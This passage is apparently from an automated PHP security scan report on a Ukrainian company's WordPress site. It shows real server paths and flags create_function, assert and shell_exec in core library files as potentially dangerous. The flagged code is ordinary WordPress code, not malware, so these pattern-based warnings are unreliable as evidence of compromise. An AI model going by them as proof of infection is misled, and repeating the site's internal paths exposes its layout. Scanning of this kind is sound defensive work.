</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_33").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/liko-holding.com.ua/wp-includes/pomo/po.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 11.67 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:19</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:31</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 1</span><br><table id="file_34" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Function create_function <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `create_function`</p><p><i>[<a href="https://www.php.net/create_function" target="_blank" class="text-primary">https://www.php.net/create_function</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">create_function</span><span style="color: #007700">(</span><span style="color: #DD0000">'$x'</span><span style="color: #007700">,&nbsp;</span><span style="color: #DD0000">"return&nbsp;</span><span style="color: #0000BB">$php_with</span><span style="color: #DD0000">.\$x;"</span><span style="color: #007700">),&nbsp;</span><span style="color: #0000BB">$lines</span><span style="color: #007700">));&nbsp;if&nbsp;(</span><span style="color: #DD0000">"\n"&nbsp;</span><span style="color: #007700">==&nbsp;</span><span style="color: #0000BB">substr</span><span style="color: #007700">(</span><span style="color: #0000BB">$string</span><span style="color: #007700">,&nbsp;-</span><span style="color: #0000BB">1</span><span style="color: #007700">))&nbsp;</span><span style="color: #0000BB">$res&nbsp;</span><span style="color: #007700">.=&nbsp;</span><span style="color: #DD0000">"\n"</span><span style="color: #007700">;&nbsp;return&nbsp;</span><span style="color: #0000BB">$res</span><span style="color: #007700">;&nbsp;}&nbsp;function&nbsp;</span><span style="color: #0000BB">comment_block</span><span style="color: #007700">(</span><span style="color: #0000BB">$text</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$char</span><span style="color: #007700">=</span><span style="color: #DD0000">'&nbsp;'</span><span style="color: #007700">)&nbsp;{&nbsp;</span><span style="color: #0000BB">$text&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">wordwrap</span><span style="color: #007700">(</span><span style="color: #0000BB">$text</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">PO_MAX_LINE_LEN&nbsp;</span><span style="color: #007700">-&nbsp;</span><span style="color: #0000BB">3</span><span style="color: #007700">);&nbsp;return&nbsp;</span><span style="color: #0000BB">PO</span><span style="color: #007700">::</span><span style="color: #0000BB">prepend_each_line</span><span style="color: #007700">(</span><span style="color: #0000BB">$text</span><span style="color: #007700">,&nbsp;</span><span style="color: #DD0000">"#</span><span style="color: #0000BB">$char</span><span style="color: #DD0000">&nbsp;"</span><span style="color: #007700">);&nbsp;}&nbsp;function&nbsp;</span><span style="color: #0000BB">export_entry</span><span style="color: #007700">(&amp;</span><span style="color: #0000BB">$entry</span><span style="color: #007700">)&nbsp;{&nbsp;if&nbsp;(</span><span style="color: #0000BB">is_null</span><span style="color: #007700">(</span><span style="color: #0000BB">$entry</span><span style="color: #007700">-&gt;</span><span style="color: #0000BB">singular</span><span style="color: #007700">))&nbsp;return&nbsp;</span><span style="color: #0000BB">false</span><span style="color: #007700">;&nbsp;</span><span style="color: #0000BB">$po&nbsp;</span><span style="color: #007700">=&nbsp;array();&nbsp;if&nbsp;(!empty(</span><span style="color: #0000BB">$entry</span><span style="color: #007700">-&gt;</span><span style="color: #0000BB">translator_comments</span><span style="color: #007700">))&nbsp;</span><span style="color: #0000BB">$po</span><span style="color: #007700">[]&nbsp;=&nbsp;</span><span style="color: #0000BB">PO</span><span style="color: #007700">::</span><span style="color: #0000BB">comment_block</span><span style="color: #007700">(</span><span style="color: #0000BB">$entry</span><span style="color: #007700">-&gt;</span><span style="color: #0000BB">translator_comments</span><span style="color: #007700">);&nbsp;if&nbsp;(!empty(</span><span style="color: #0000BB">$entry</span><span style="color: #007700">-&gt;</span><span style="color: #0000BB">extracted_comments</span><span style="color: #007700">))&nbsp;</span><span style="color: #0000BB">$po</span><span style="color: #007700">[]&nbsp;=&nbsp;</span><span style="color: #0000BB">PO</span><span style="color: #007700">:...</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_34").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/liko-holding.com.ua/wp-includes/pomo/translations.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 8.17 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:19</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:31</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 1</span><br><table id="file_35" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Function create_function <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `create_function`</p><p><i>[<a href="https://www.php.net/create_function" target="_blank" class="text-primary">https://www.php.net/create_function</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">create_function</span><span style="color: #007700">(</span><span style="color: #DD0000">'$n'</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$func_body</span><span style="color: #007700">);&nbsp;}&nbsp;function&nbsp;</span><span style="color: #0000BB">parenthesize_plural_exression</span><span style="color: #007700">(</span><span style="color: #0000BB">$expression</span><span style="color: #007700">)&nbsp;{&nbsp;</span><span style="color: #0000BB">$expression&nbsp;</span><span style="color: #007700">.=&nbsp;</span><span style="color: #DD0000">';'</span><span style="color: #007700">;&nbsp;</span><span style="color: #0000BB">$res&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #DD0000">''</span><span style="color: #007700">;&nbsp;</span><span style="color: #0000BB">$depth&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">0</span><span style="color: #007700">;&nbsp;for&nbsp;(</span><span style="color: #0000BB">$i&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">0</span><span style="color: #007700">;&nbsp;</span><span style="color: #0000BB">$i&nbsp;</span><span style="color: #007700">&lt;&nbsp;</span><span style="color: #0000BB">strlen</span><span style="color: #007700">(</span><span style="color: #0000BB">$expression</span><span style="color: #007700">);&nbsp;++</span><span style="color: #0000BB">$i</span><span style="color: #007700">)&nbsp;{&nbsp;</span><span style="color: #0000BB">$char&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">$expression</span><span style="color: #007700">[</span><span style="color: #0000BB">$i</span><span style="color: #007700">];&nbsp;switch&nbsp;(</span><span style="color: #0000BB">$char</span><span style="color: #007700">)&nbsp;{&nbsp;case&nbsp;</span><span style="color: #DD0000">'?'</span><span style="color: #007700">:&nbsp;</span><span style="color: #0000BB">$res&nbsp;</span><span style="color: #007700">.=&nbsp;</span><span style="color: #DD0000">'&nbsp;?&nbsp;('</span><span style="color: #007700">;&nbsp;</span><span style="color: #0000BB">$depth</span><span style="color: #007700">++;&nbsp;break;&nbsp;case&nbsp;</span><span style="color: #DD0000">':'</span><span style="color: #007700">:&nbsp;</span><span style="color: #0000BB">$res&nbsp;</span><span style="color: #007700">.=&nbsp;</span><span style="color: #DD0000">')&nbsp;:&nbsp;('</span><span style="color: #007700">;&nbsp;break;&nbsp;case&nbsp;</span><span style="color: #DD0000">';'</span><span style="color: #007700">:&nbsp;</span><span style="color: #0000BB">$res&nbsp;</span><span style="color: #007700">.=&nbsp;</span><span style="color: #0000BB">str_repeat</span><span style="color: #007700">(</span><span style="color: #DD0000">')'</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$depth</span><span style="color: #007700">)&nbsp;.&nbsp;</span><span style="color: #DD0000">';'</span><span style="color: #007700">;&nbsp;</span><span style="color: #0000BB">$depth</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">0</span><span style="color: #007700">;&nbsp;break;&nbsp;default:&nbsp;</span><span style="color: #0000BB">$res&nbsp;</span><span style="color: #007700">.=&nbsp;</span><span style="color: #0000BB">$char</span><span style="color: #007700">;&nbsp;}&nbsp;}&nbsp;return&nbsp;</span><span style="color: #0000BB">rtrim</span><span style="color: #007700">(</span><span style="color: #0000BB">$res</span><span style="color: #007700">,&nbsp;</span><span style="color: #DD0000">';'</span><span style="color: #007700">);&nbsp;}&nbsp;function&nbsp;</span><span style="color: #0000BB">make_headers</span><span style="color: #007700">(</span><span style="color: #0000BB">$translation</span><span style="color: #007700">)&nbsp;{&nbsp;</span><span style="color: #0000BB">$headers&nbsp;</span><span style="color: #007700">=&nbsp;array();&nbsp;</span><span style="color: #0000BB">$translation&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">str_r</span><span style="color: #007700">...</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_35").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/liko-holding.com.ua/wp-includes/Text/Diff.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 11.67 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:18</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:31</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 1</span><br><table id="file_36" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Function assert <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `assert`</p><p><i>[<a href="https://www.php.net/assert" target="_blank" class="text-primary">https://www.php.net/assert</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">assert</span><span style="color: #007700">(</span><span style="color: #0000BB">count</span><span style="color: #007700">(</span><span style="color: #0000BB">$from_lines</span><span style="color: #007700">)&nbsp;==&nbsp;</span><span style="color: #0000BB">count</span><span style="color: #007700">(</span><span style="color: #0000BB">$mapped_from_lines</span><span style="color: #007700">));&nbsp;</span><span style="color: #0000BB">assert</span><span style="color: #007700">(</span><span style="color: #0000BB">count</span><span style="color: #007700">(</span><span style="color: #0000BB">$to_lines</span><span style="color: #007700">)&nbsp;==&nbsp;</span><span style="color: #0000BB">count</span><span style="color: #007700">(</span><span style="color: #0000BB">$mapped_to_lines</span><span style="color: #007700">));&nbsp;</span><span style="color: #0000BB">parent</span><span style="color: #007700">::</span><span style="color: #0000BB">Text_Diff</span><span style="color: #007700">(</span><span style="color: #0000BB">$mapped_from_lines</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$mapped_to_lines</span><span style="color: #007700">);&nbsp;</span><span style="color: #0000BB">$xi&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">$yi&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">0</span><span style="color: #007700">;&nbsp;for&nbsp;(</span><span style="color: #0000BB">$i&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">0</span><span style="color: #007700">;&nbsp;</span><span style="color: #0000BB">$i&nbsp;</span><span style="color: #007700">&lt;&nbsp;</span><span style="color: #0000BB">count</span><span style="color: #007700">(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-&gt;</span><span style="color: #0000BB">_edits</span><span style="color: #007700">);&nbsp;</span><span style="color: #0000BB">$i</span><span style="color: #007700">++)&nbsp;{&nbsp;</span><span style="color: #0000BB">$orig&nbsp;</span><span style="color: #007700">=&nbsp;&amp;</span><span style="color: #0000BB">$this</span><span style="color: #007700">-&gt;</span><span style="color: #0000BB">_edits</span><span style="color: #007700">[</span><span style="color: #0000BB">$i</span><span style="color: #007700">]-&gt;</span><span style="color: #0000BB">orig</span><span style="color: #007700">;&nbsp;if&nbsp;(</span><span style="color: #0000BB">is_array</span><span style="color: #007700">(</span><span style="color: #0000BB">$orig</span><span style="color: #007700">))&nbsp;{&nbsp;</span><span style="color: #0000BB">$orig&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">array_slice</span><span style="color: #007700">(</span><span style="color: #0000BB">$from_lines</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$xi</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">count</span><span style="color: #007700">(</span><span style="color: #0000BB">$orig</span><span style="color: #007700">));&nbsp;</span><span style="color: #0000BB">$xi&nbsp;</span><span style="color: #007700">+=&nbsp;</span><span style="color: #0000BB">count</span><span style="color: #007700">(</span><span style="color: #0000BB">$orig</span><span style="color: #007700">);&nbsp;}&nbsp;</span><span style="color: #0000BB">$final&nbsp;</span><span style="color: #007700">=&nbsp;&amp;</span><span style="color: #0000BB">$this</span><span style="color: #007700">-&gt;</span><span style="color: #0000BB">_edits</span><span style="color: #007700">[</span><span style="color: #0000BB">$i</span><span style="color: #007700">]-&gt;</span><span style="color: #0000BB">final</span><span style="color: #007700">;&nbsp;if&nbsp;(</span><span style="color: #0000BB">is_array</span><span style="color: #007700">(</span><span style="color: #0000BB">$final</span><span style="color: #007700">))&nbsp;{&nbsp;</span><span style="color: #0000BB">$final&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">array_slice</span><span style="color: #007700">(</span><span style="color: #0000BB">$to_lines</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$yi</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">count</span><span style="color: #007700">(</span><span style="color: #0000BB">$final</span><span style="color: #007700">));&nbsp;</span><span style="color: #0000BB">$yi&nbsp;</span><span style="color: #007700">+=&nbsp;</span><span style="color: #0000BB">count</span><span style="color: #007700">(</span><span style="color: #0000BB">$final</span><span style="color: #007700">);&nbsp;}&nbsp;...</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_36").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/liko-holding.com.ua/wp-includes/Text/Diff/Engine/shell.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 5.05 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:18</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:31</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 2</span><br><table id="file_37" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Function assert <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `assert`</p><p><i>[<a href="https://www.php.net/assert" target="_blank" class="text-primary">https://www.php.net/assert</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">assert</span><span style="color: #007700">(</span><span style="color: #DD0000">'$match[1]&nbsp;-&nbsp;$from_line_no&nbsp;==&nbsp;$match[4]&nbsp;-&nbsp;$to_line_no'</span><span style="color: #007700">);&nbsp;</span><span style="color: #0000BB">array_push</span><span style="color: #007700">(</span><span style="color: #0000BB">$edits</span><span style="color: #007700">,&nbsp;new&nbsp;</span><span style="color: #0000BB">Text_Diff_Op_copy</span><span style="color: #007700">(&nbsp;</span><span style="color: #0000BB">$this</span><span style="color: #007700">-&gt;</span><span style="color: #0000BB">_getLines</span><span style="color: #007700">(</span><span style="color: #0000BB">$from_lines</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$from_line_no</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$match</span><span style="color: #007700">[</span><span style="color: #0000BB">1</span><span style="color: #007700">]&nbsp;-&nbsp;</span><span style="color: #0000BB">1</span><span style="color: #007700">),&nbsp;</span><span style="color: #0000BB">$this</span><span style="color: #007700">-&gt;</span><span style="color: #0000BB">_getLines</span><span style="color: #007700">(</span><span style="color: #0000BB">$to_lines</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$to_line_no</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$match</span><span style="color: #007700">[</span><span style="color: #0000BB">4</span><span style="color: #007700">]&nbsp;-&nbsp;</span><span style="color: #0000BB">1</span><span style="color: #007700">)));&nbsp;}&nbsp;switch&nbsp;(</span><span style="color: #0000BB">$match</span><span style="color: #007700">[</span><span style="color: #0000BB">3</span><span style="color: #007700">])&nbsp;{&nbsp;case&nbsp;</span><span style="color: #DD0000">'d'</span><span style="color: #007700">:&nbsp;</span><span style="color: #0000BB">array_push</span><span style="color: #007700">(</span><span style="color: #0000BB">$edits</span><span style="color: #007700">,&nbsp;new&nbsp;</span><span style="color: #0000BB">Text_Diff_Op_delete</span><span style="color: #007700">(&nbsp;</span><span style="color: #0000BB">$this</span><span style="color: #007700">-&gt;</span><span style="color: #0000BB">_getLines</span><span style="color: #007700">(</span><span style="color: #0000BB">$from_lines</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$from_line_no</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$match</span><span style="color: #007700">[</span><span style="color: #0000BB">2</span><span style="color: #007700">])));&nbsp;</span><span style="color: #0000BB">$to_line_no</span><span style="color: #007700">++;&nbsp;break;&nbsp;case&nbsp;</span><span style="color: #DD0000">'c'</span><span style="color: #007700">:&nbsp;</span><span style="color: #0000BB">array_push</span><span style="color: #007700">(</span><span style="color: #0000BB">$edits</span><span style="color: #007700">,&nbsp;new&nbsp;</span><span style="color: #0000BB">Text_Diff_Op_change</span><span style="color: #007700">(&nbsp;</span><span style="color: #0000BB">$this</span><span style="color: #007700">-&gt;</span><span style="color: #0000BB">_getLines</span><span style="color: #007700">(</span><span style="color: #0000BB">$from_lines</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$from_line_no</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$match</span><span style="color: #007700">[</span><span style="color: #0000BB">2</span><span style="color: #007700">]),&nbsp;</span><span style="color: #0000BB">$this</span><span style="color: #007700">...</span>
</span>
</code></code></td></tr><tr><td><p><b>Function shell_exec <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `shell_exec`</p><p><i>[<a href="https://www.php.net/shell_exec" target="_blank" class="text-primary">https://www.php.net/shell_exec</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">shell_exec</span><span style="color: #007700">(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-&gt;</span><span style="color: #0000BB">_diffCommand&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #DD0000">'&nbsp;'&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #0000BB">$from_file&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #DD0000">'&nbsp;'&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #0000BB">$to_file</span><span style="color: #007700">);&nbsp;</span><span style="color: #0000BB">unlink</span><span style="color: #007700">(</span><span style="color: #0000BB">$from_file</span><span style="color: #007700">);&nbsp;</span><span style="color: #0000BB">unlink</span><span style="color: #007700">(</span><span style="color: #0000BB">$to_file</span><span style="color: #007700">);&nbsp;if&nbsp;(</span><span style="color: #0000BB">is_null</span><span style="color: #007700">(</span><span style="color: #0000BB">$diff</span><span style="color: #007700">))&nbsp;{&nbsp;return&nbsp;array(new&nbsp;</span><span style="color: #0000BB">Text_Diff_Op_copy</span><span style="color: #007700">(</span><span style="color: #0000BB">$from_lines</span><span style="color: #007700">));&nbsp;}&nbsp;</span><span style="color: #0000BB">$from_line_no&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">1</span><span style="color: #007700">;&nbsp;</span><span style="color: #0000BB">$to_line_no&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">1</span><span style="color: #007700">;&nbsp;</span><span style="color: #0000BB">$edits&nbsp;</span><span style="color: #007700">=&nbsp;array();&nbsp;</span><span style="color: #0000BB">preg_match_all</span><span style="color: #007700">(</span><span style="color: #DD0000">'#^(\d+)(?:,(\d+))?([adc])(\d+)(?:,(\d+))?$#m'</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$diff</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$matches</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">PREG_SET_ORDER</span><span style="color: #007700">);&nbsp;foreach&nbsp;(</span><span style="color: #0000BB">$matches&nbsp;</span><span style="color: #007700">as&nbsp;</span><span style="color: #0000BB">$match</span><span style="color: #007700">)&nbsp;{&nbsp;if&nbsp;(!isset(</span><span style="color: #0000BB">$match</span><span style="color: #007700">[</span><span style="color: #0000BB">5</span><span style="color: #007700">]))&nbsp;{&nbsp;</span><span style="color: #0000BB">$match</span><span style="color: #007700">[</span><span style="color: #0000BB">5</span><span style="color: #007700">]&nbsp;=&nbsp;</span><span style="color: #0000BB">false</span><span style="color: #007700">;&nbsp;}&nbsp;if&nbsp;(</span><span style="color: #0000BB">$match</span><span style="color: #007700">[</span><span style="color: #0000BB">3</span><span style="color: #007700">]&nbsp;==&nbsp;</span><span style="color: #DD0000">'a'</span><span style="color: #007700">)&nbsp;{&nbsp;</span><span style="color: #0000BB">$from_line_no</span><span style="color: #007700">--;&nbsp;}&nbsp;if&nbsp;(</span><span style="color: #0000BB">$match</span><span style="color: #007700">[</span><span style="color: #0000BB">3</span><span style="color: #007700">]&nbsp;==&nbsp;</span><span style="color: #DD0000">'d'</span><span style="color: #007700">)&nbsp;{&nbsp;</span><span style="color: #0000BB">$to_line_no</span><span style="color: #007700">--;&nbsp;}&nbsp;if&nbsp;(</span><span style="color: #0000BB">$fr</span><span style="color: #007700">...</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_37").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/liko-holding.com.ua/wp-includes/Text/Diff/Engine/native.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 15.47 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:18</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:31</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 1</span><br><table id="file_38" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Function assert <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `assert`</p><p><i>[<a href="https://www.php.net/assert" target="_blank" class="text-primary">https://www.php.net/assert</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">assert</span><span style="color: #007700">(</span><span style="color: #0000BB">$yi&nbsp;</span><span style="color: #007700">&lt;&nbsp;</span><span style="color: #0000BB">$n_to&nbsp;</span><span style="color: #007700">||&nbsp;</span><span style="color: #0000BB">$this</span><span style="color: #007700">-&gt;</span><span style="color: #0000BB">xchanged</span><span style="color: #007700">[</span><span style="color: #0000BB">$xi</span><span style="color: #007700">]);&nbsp;</span><span style="color: #0000BB">assert</span><span style="color: #007700">(</span><span style="color: #0000BB">$xi&nbsp;</span><span style="color: #007700">&lt;&nbsp;</span><span style="color: #0000BB">$n_from&nbsp;</span><span style="color: #007700">||&nbsp;</span><span style="color: #0000BB">$this</span><span style="color: #007700">-&gt;</span><span style="color: #0000BB">ychanged</span><span style="color: #007700">[</span><span style="color: #0000BB">$yi</span><span style="color: #007700">]);&nbsp;</span><span style="color: #0000BB">$copy&nbsp;</span><span style="color: #007700">=&nbsp;array();&nbsp;while&nbsp;(</span><span style="color: #0000BB">$xi&nbsp;</span><span style="color: #007700">&lt;&nbsp;</span><span style="color: #0000BB">$n_from&nbsp;</span><span style="color: #007700">&amp;&amp;&nbsp;</span><span style="color: #0000BB">$yi&nbsp;</span><span style="color: #007700">&lt;&nbsp;</span><span style="color: #0000BB">$n_to&nbsp;</span><span style="color: #007700">&amp;&amp;&nbsp;!</span><span style="color: #0000BB">$this</span><span style="color: #007700">-&gt;</span><span style="color: #0000BB">xchanged</span><span style="color: #007700">[</span><span style="color: #0000BB">$xi</span><span style="color: #007700">]&nbsp;&amp;&amp;&nbsp;!</span><span style="color: #0000BB">$this</span><span style="color: #007700">-&gt;</span><span style="color: #0000BB">ychanged</span><span style="color: #007700">[</span><span style="color: #0000BB">$yi</span><span style="color: #007700">])&nbsp;{&nbsp;</span><span style="color: #0000BB">$copy</span><span style="color: #007700">[]&nbsp;=&nbsp;</span><span style="color: #0000BB">$from_lines</span><span style="color: #007700">[</span><span style="color: #0000BB">$xi</span><span style="color: #007700">++];&nbsp;++</span><span style="color: #0000BB">$yi</span><span style="color: #007700">;&nbsp;}&nbsp;if&nbsp;(</span><span style="color: #0000BB">$copy</span><span style="color: #007700">)&nbsp;{&nbsp;</span><span style="color: #0000BB">$edits</span><span style="color: #007700">[]&nbsp;=&nbsp;new&nbsp;</span><span style="color: #0000BB">Text_Diff_Op_copy</span><span style="color: #007700">(</span><span style="color: #0000BB">$copy</span><span style="color: #007700">);&nbsp;}&nbsp;</span><span style="color: #0000BB">$delete&nbsp;</span><span style="color: #007700">=&nbsp;array();&nbsp;while&nbsp;(</span><span style="color: #0000BB">$xi&nbsp;</span><span style="color: #007700">&lt;&nbsp;</span><span style="color: #0000BB">$n_from&nbsp;</span><span style="color: #007700">&amp;&amp;&nbsp;</span><span style="color: #0000BB">$this</span><span style="color: #007700">-&gt;</span><span style="color: #0000BB">xchanged</span><span style="color: #007700">[</span><span style="color: #0000BB">$xi</span><span style="color: #007700">])&nbsp;{&nbsp;</span><span style="color: #0000BB">$delete</span><span style="color: #007700">[]&nbsp;=&nbsp;</span><span style="color: #0000BB">$from_lines</span><span style="color: #007700">[</span><span style="color: #0000BB">$xi</span><span style="color: #007700">++];&nbsp;}&nbsp;</span><span style="color: #0000BB">$add&nbsp;</span><span style="color: #007700">=&nbsp;array();&nbsp;while&nbsp;(</span><span style="color: #0000BB">$yi&nbsp;</span><span style="color: #007700">&lt;&nbsp;</span><span style="color: #0000BB">$n_to&nbsp;</span><span style="color: #007700">&amp;&amp;&nbsp;</span><span style="color: #0000BB">$this</span><span style="color: #007700">-&gt;</span><span style="color: #0000BB">ychanged</span><span style="color: #007700">[</span><span style="color: #0000BB">$yi</span><span style="color: #007700">])&nbsp;{&nbsp;</span><span style="color: #0000BB">$add</span><span style="color: #007700">[]&nbsp;=&nbsp;</span><span style="color: #0000BB">$to_lines</span><span style="color: #007700">[</span><span style="color: #0000BB">$yi</span><span style="color: #007700">++];&nbsp;}&nbsp;if&nbsp;(</span><span style="color: #0000BB">$delete&nbsp;</span><span style="color: #007700">&amp;&amp;&nbsp;...</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_38").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/liko-holding.com.ua/wp-includes/atomlib.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 10.66 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:18</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:31</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 1</span><br><table id="file_39" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Function create_function <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `create_function`</p><p><i>[<a href="https://www.php.net/create_function" target="_blank" class="text-primary">https://www.php.net/create_function</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">create_function</span><span style="color: #007700">(</span><span style="color: #DD0000">'$k,$v'</span><span style="color: #007700">,&nbsp;</span><span style="color: #DD0000">'return&nbsp;"$k=\"$v\"";'</span><span style="color: #007700">);&nbsp;</span><span style="color: #0000BB">$this</span><span style="color: #007700">-&gt;</span><span style="color: #0000BB">map_xmlns_func&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">create_function</span><span style="color: #007700">(</span><span style="color: #DD0000">'$p,$n'</span><span style="color: #007700">,&nbsp;</span><span style="color: #DD0000">'$xd&nbsp;=&nbsp;"xmlns";&nbsp;if(strlen($n[0])&gt;0)&nbsp;$xd&nbsp;.=&nbsp;":{$n[0]}";&nbsp;return&nbsp;"{$xd}=\"{$n[1]}\"";'</span><span style="color: #007700">);&nbsp;}&nbsp;function&nbsp;</span><span style="color: #0000BB">_p</span><span style="color: #007700">(</span><span style="color: #0000BB">$msg</span><span style="color: #007700">)&nbsp;{&nbsp;if(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-&gt;</span><span style="color: #0000BB">debug</span><span style="color: 